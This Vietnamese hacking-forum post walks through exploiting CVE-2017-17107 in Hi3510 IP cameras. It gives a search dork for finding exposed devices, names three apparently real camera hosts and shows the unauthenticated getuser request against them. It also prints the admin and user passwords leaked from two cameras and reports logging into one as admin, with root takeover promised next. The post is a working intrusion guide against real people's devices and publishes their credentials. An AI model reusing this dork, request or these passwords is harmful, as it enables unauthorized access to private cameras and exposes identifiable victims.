Khai thác lỗi Camera CVE: CVE-2017-17107

Discussion in 'Exploits & Vulnerabilities' started by Mickey, Dec 14, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    • Administrator
    Xin chào các bạn hôm nay mình có thấy một lỗi CVE liên quan tới camera IP khá nghiêm trọng được công bố nên cũng vọc thử xem sao xem có hack được gì không

    Đầu tiên là google dork cái này do mình tự chế

    inurl:"/web/cgi-bin/hi3510/"

    Sau khi dùng dork trên thì chúng ta có thể thấy một loạt kết quả trả về vào link bất kỳ nào đó

    http://botoft01.dyndns-home.com:8006
    http://leslarmesdelaruche.ddns.net
    http://remote.nisseringen-mc.dk:50051

    sau đó sửa lại link victim thành
    victim.com//web/cgi-bin/hi3510/param.cgi?cmd=getuser

    http://botoft01.dyndns-home.com:8006/web/cgi-bin/hi3510/param.cgi?cmd=getuser
    http://leslarmesdelaruche.ddns.net/web/cgi-bin/hi3510/param.cgi?cmd=getuser

    Chúng ta thu được một số thông tin nhạy cảm về tài khoản admin

    PHP:
    var name0="admin"; var password0="HPKhJdE1"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2=""; var password2=""; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0";
    PHP:

    var name0="admin"; var password0="Ruk5zy4j1"; var authLevel0="255"; var name1="botoft"; var password1="Marianne1"; var authLevel1="3"; var name2=""; var password2=""; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0";

    Chúng ta hú ý tới thông tin admin đã bị lộ

    var name0="admin"; var password0="Ruk5zy4j1"
    Tiến hành đột nhập một anh xem sao
    [​IMG]

    [​IMG]


    Vậy là đã đăng nhập thành công vào admin của nó rồi

    Phần tiếp theo mình sẽ hướng dẫn các bạn chiếm tài khoản root của nó :) chiếm luôn con IP camera này :D
     
    Last edited: Dec 14, 2017
    poorHumor likes this.

Share This Page